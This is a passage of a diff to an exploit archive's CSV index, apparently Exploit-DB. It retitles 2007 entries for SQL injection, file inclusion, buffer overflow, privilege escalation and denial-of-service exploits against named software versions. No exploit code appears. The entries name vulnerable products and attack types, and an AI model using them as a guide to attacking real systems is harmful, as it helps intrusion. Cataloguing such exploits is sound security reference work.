Inclusion",2007-02-25,GoLd_M,php,webapps,0 -3375,platforms/multiple/remote/3375.pl,"Oracle 10g KUPW$WORKER.MAIN - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 +3375,platforms/multiple/remote/3375.pl,"Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 3376,platforms/multiple/remote/3376.pl,"Oracle 10g KUPV$FT.ATTACH_JOB - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 3377,platforms/multiple/remote/3377.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 3378,platforms/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 @@ -3059,8 +3059,8 @@ id,file,description,date,author,platform,type,port 3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Privilege Escalation",2007-02-28,"Kevin Finisterre",osx,local,0 3387,platforms/php/webapps/3387.php,"vBulletin 3.6.4 - (inlinemod.php postids) SQL Injection",2007-02-28,rgod,php,webapps,0 -3388,platforms/windows/remote/3388.pl,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 -3389,platforms/linux/remote/3389.c,"madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote,0 +3388,platforms/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 +3389,platforms/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote,0 3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - (default.asp id) SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote,0 3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - 'npdivx32.dll' Remote Denial of Service",2007-03-01,shinnai,windows,dos,0 @@ -3103,7 +3103,7 @@ id,file,description,date,author,platform,type,port 3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0 3430,platforms/windows/dos/3430.html,"Adobe Reader Plugin 'AcroPDF.dll' 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0 -3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 +3432,platforms/windows/dos/3432.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - (UDP) Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 3433,platforms/windows/dos/3433.html,"Rediff Toolbar - ActiveX Control Remote Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote Denial of Service",2007-03-08,Antimatt3r,multiple,dos,0 3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - (down.php file_to_download) Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 @@ -3188,7 +3188,7 @@ id,file,description,date,author,platform,type,port 3517,platforms/osx/local/3517.php,"PHP 5.2.0 (OSX) - header() Space Trimming Buffer Underflow Exploit",2007-03-19,"Stefan Esser",osx,local,0 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion",2007-03-19,GoLd_M,php,webapps,0 3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 -3520,platforms/asp/webapps/3520.txt,"NetVios Portal - 'page.asp' SQL Injection",2007-03-19,parad0x,asp,webapps,0 +3520,platforms/asp/webapps/3520.txt,"NetVIOS Portal - 'page.asp' SQL Injection",2007-03-19,parad0x,asp,webapps,0 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 (Windows) - Local File Inclusion",2007-03-19,bd0rk,php,webapps,0 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,php,webapps,0 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 @@ -3227,7 +3227,7 @@ id,file,description,date,author,platform,type,port 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - Unserialize() Local Information Leak Exploit",2007-03-23,"Stefan Esser",multiple,local,0 3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 -3561,platforms/windows/remote/3561.pl,"Mercury Mail 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 +3561,platforms/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 3563,platforms/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php lib_path' Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla! Component Car Manager 1.1 - SQL Injection",2007-03-24,ajann,php,webapps,0 @@ -3342,14 +3342,14 @@ id,file,description,date,author,platform,type,port 3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - (download2.php fn1) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 3678,platforms/php/webapps/3678.php,"SmodBIP 1.06 - (aktualnosci zoom) SQL Injection",2007-04-06,Kacper,php,webapps,0 3679,platforms/php/webapps/3679.php,"SmodCMS 2.10 - (Slownik ssid) SQL Injection",2007-04-06,Kacper,php,webapps,0 -3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80 +3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80 3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - (smilies.php config) Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] Local File Inclusion",2007-04-08,bd0rk,php,webapps,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service",2007-04-08,Marsu,windows,dos,0 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - Remote File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 - (index.php menu) Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 - (sn_admin_dir) Local File Inclusion",2007-04-08,BeyazKurt,php,webapps,0 -3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Privilege Escalation (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 +3688,platforms/windows/local/3688.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - 'lang' Local File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0 @@ -3389,7 +3389,7 @@ id,file,description,date,author,platform,type,port 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service",2007-04-13,evilrabbi,multiple,dos,0 3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0 3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote,0 -3729,platforms/php/webapps/3729.txt,"qdblog 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 +3729,platforms/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3731,platforms/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 @@ -3415,7 +3415,7 @@ id,file,description,date,author,platform,type,port 3752,platforms/php/webapps/3752.txt,"AjPortal2Php - (PagePrefix) Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",php,webapps,0 3753,platforms/php/webapps/3753.txt,"Joomla! Component JoomlaPack 1.0.4a2 RE - (CAltInstaller.php) Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 3754,platforms/php/webapps/3754.pl,"MiniGal b13 - (image backdoor) Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0 -3755,platforms/windows/local/3755.c,"Microsoft Windows GDI - Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 +3755,platforms/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0 3758,platforms/php/webapps/3758.php,"ShoutPro 1.5.2 - (shout.php) Remote Code Injection",2007-04-17,Gammarays,php,webapps,0 @@ -3424,7 +3424,7 @@ id,file,description,date,author,platform,type,port 3761,platforms/php/webapps/3761.txt,"Mozzers SubSystem final - 'subs.php' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - (process.php update) Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 - (root) Remote File Inclusion",2007-04-18,GoLd_M,php,webapps,0 -3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - (force_download.php) Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 +3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - 'force_download.php' Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 3765,platforms/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - (error.asp id) SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 @@ -3526,7 +3526,7 @@ id,file,description,date,author,platform,type,port 3863,platforms/php/webapps/3863.txt,"Wikivi5 - 'show.php sous_rep' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 3864,platforms/php/webapps/3864.txt,"Friendly 1.0d1 - (friendly_path) Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - (RESPATH) Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 -3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Upload - ActiveX 6.36 (AddFile) Remote Denial of Service",2007-05-07,shinnai,windows,dos,0 +3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Uploader - ActiveX 6.36 (AddFile) Remote Denial of Service",2007-05-07,shinnai,windows,dos,0 3867,platforms/php/webapps/3867.pl,"ACGVAnnu 1.3 - (acgv.php rubrik) Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 3868,platforms/php/webapps/3868.txt,"DynamicPAD 1.02.18 - (HomeDir) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 - (beryliumroot) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 @@ -3548,7 +3548,7 @@ id,file,description,date,author,platform,type,port 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection",2007-05-09,Silentz,php,webapps,0 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection",2007-05-09,Silentz,php,webapps,0 -3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 +3888,platforms/windows/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service",2007-05-10,shinnai,windows,dos,0 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 @@ -3636,7 +3636,7 @@ id,file,description,date,author,platform,type,port 3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0 3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project - (Company Name) Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project - (Description) Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 -3978,platforms/windows/dos/3978.pl,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (PoC)",2007-05-24,n00b,windows,dos,0 +3978,platforms/windows/dos/3978.pl,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)",2007-05-24,n00b,windows,dos,0 3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)",2007-05-24,shinnai,windows,dos,0 3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection",2007-05-24,Silentz,php,webapps,0 3981,platforms/php/webapps/3981.php,"cpCommerce 1.1.0 - (category.php id_category) SQL Injection",2007-05-24,Kacper,php,webapps,0 @@ -3654,13 +3654,13 @@ id,file,description,date,author,platform,type,port 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,windows,remote,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion",2007-05-26,"ThE TiGeR",php,webapps,0 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - (admin.php site_url) Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 -3996,platforms/windows/remote/3996.c,"Apache 2.0.58 Mod_Rewrite - Remote Overflow (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80 +3996,platforms/windows/remote/3996.c,"Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b - (securelib) Remote File Inclusion",2007-05-27,"ThE TiGeR",php,webapps,0 3998,platforms/php/webapps/3998.php,"Fundanemt 2.2.0 - (spellcheck.php) Remote Code Execution",2007-05-27,Kacper,php,webapps,0 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a - (skin) Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 4000,platforms/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0 -4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0 -4002,platforms/windows/local/4002.py,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (2)",2007-05-28,"Thomas Pollet",windows,local,0 +4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0 +4002,platforms/windows/local/4002.py,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)",2007-05-28,"Thomas Pollet",windows,local,0 4003,platforms/php/webapps/4003.sh,"Joomla! Component Phil-a-Form 1.2.0.0 - SQL Injection",2007-05-28,CypherXero,php,webapps,0 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,php,webapps,0 4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0 @@ -3701,7 +3701,7 @@ id,file,description,date,author,platform,type,port 4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion",2007-06-07,GoLd_M,php,webapps,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,windows,remote,0 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow 2",2007-06-07,Excepti0n,windows,remote,0 -4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service",2007-06-07,Kad,windows,dos,0 +4044,platforms/windows/dos/4044.txt,"Microsoft Windows - GDI+ '.ICO' File Remote Denial of Service",2007-06-07,Kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb HTTP Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0 4047,platforms/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service",2007-06-08,mu-b,windows,dos,0 @@ -3717,7 +3717,7 @@ id,file,description,date,author,platform,type,port 4058,platforms/windows/dos/4058.py,"Ace-FTP Client 1.24a - Remote Buffer Overflow (PoC)",2007-06-10,n00b,windows,dos,0 4059,platforms/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution",2007-06-11,CorryL,php,webapps,0 4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite",2007-06-12,shinnai,windows,remote,0 -4061,platforms/windows/remote/4061.html,"Safari 3 for Windows Beta - Remote Command Execution (PoC)",2007-06-12,"Thor Larholm",windows,remote,0 +4061,platforms/windows/remote/4061.html,"Apple Safari 3 for Windows Beta - Remote Command Execution (PoC)",2007-06-12,"Thor Larholm",windows,remote,0 4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - (low.php topic) SQL Injection",2007-06-12,Silentz,php,webapps,0 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion",2007-06-12,Sp[L]o1T,php,webapps,0 4064,platforms/php/webapps/4064.txt,"XOOPS Module horoscope 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,php,webapps,0 @@ -3730,7 +3730,7 @@ id,file,description,date,author,platform,type,port 4071,platforms/php/webapps/4071.txt,"Sitellite CMS 4.2.12 - (559668.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 - (PHPhtml.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 4074,platforms/php/webapps/4074.txt,"PHPMyInventory 2.8 - (global.inc.php) Remote File Inclusion",2007-06-16,o0xxdark0o,php,webapps,0 -4075,platforms/php/webapps/4075.txt,"YourFreeScreamer 1.0 - (serverPath) Remote File Inclusion",2007-06-17,Crackers_Child,php,webapps,0 +4075,platforms/php/webapps/4075.txt,"YourFreeScreamer 1.0 - 'serverPath' Remote File Inclusion",2007-06-17,Crackers_Child,php,webapps,0 4076,platforms/php/webapps/4076.php,"MiniBB 2.0.5 - 'Language' Local File Inclusion",2007-06-17,Dj7xpl,php,webapps,0 4078,platforms/php/webapps/4078.php,"Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-18,BlackHawk,php,webapps,0 4079,platforms/php/webapps/4079.txt,"MiniBill 1.2.5 - (run_billing.php) Remote File Inclusion",2007-06-18,Abo0od,php,webapps,0 @@ -3747,7 +3747,7 @@ id,file,description,date,author,platform,type,port 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 4092,platforms/php/webapps/4092.txt,"NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 -4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 +4094,platforms/windows/remote/4094.html,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 @@ -3787,7 +3787,7 @@ id,file,description,date,author,platform,type,port 4132,platforms/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusion",2007-06-30,"Mehmet Ince",php,webapps,0 4133,platforms/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - 'process.php' SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 -4135,platforms/php/webapps/4135.pl,"PHPEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection",2007-07-01,Iron,php,webapps,0 +4135,platforms/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection",2007-07-01,Iron,php,webapps,0 4136,platforms/php/webapps/4136.txt,"YouTube Clone Script - 'msg.php id' SQL Injection",2007-07-02,t0pP8uZz,php,webapps,0 4137,platforms/windows/dos/4137.html,"HP Instant Support - (Driver Check) Remote Buffer Overflow (PoC)",2007-07-02,shinnai,windows,dos,0 4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b - (index.php id) SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 @@ -3855,7 +3855,7 @@ id,file,description,date,author,platform,type,port 4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x - (Topics topicid) SQL Injection",2007-07-18,anonymous,php,webapps,0 4200,platforms/windows/remote/4200.html,"Versalsoft HTTP File Uploader - AddFile() Remote Buffer Overflow",2007-07-19,shinnai,windows,remote,0 4201,platforms/php/webapps/4201.txt,"Joomla! Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0 -4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g Evil Views - Change Passwords Exploit",2007-07-19,bunker,multiple,local,0 +4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords Exploit",2007-07-19,bunker,multiple,local,0 4204,platforms/windows/local/4204.php,"PHP 5.2.3 - snmpget() object id Local Buffer Overflow",2007-07-20,shinnai,windows,local,0 4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 - (Windows Release) Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos,0 4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 @@ -3933,7 +3933,7 @@ id,file,description,date,author,platform,type,port 4277,platforms/php/webapps/4277.php,"PHP Blue Dragon CMS 3.0.0 - Remote Code Execution",2007-08-10,Kacper,php,webapps,0 4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - (pixlie.php root) Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 -4280,platforms/windows/remote/4280.pl,"Savant 3.1 - GET Request Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 +4280,platforms/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Request Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 4281,platforms/windows/dos/4281.c,"WengoPhone 2.x - SIP Phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0 4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 @@ -3942,19 +3942,19 @@ id,file,description,date,author,platform,type,port 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass (SQL Injection)",2007-08-14,s4squatch,cgi,webapps,0 4287,platforms/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0 -4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 +4289,platforms/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0 4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,windows,dos,0 -4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 +4294,platforms/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 -4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - 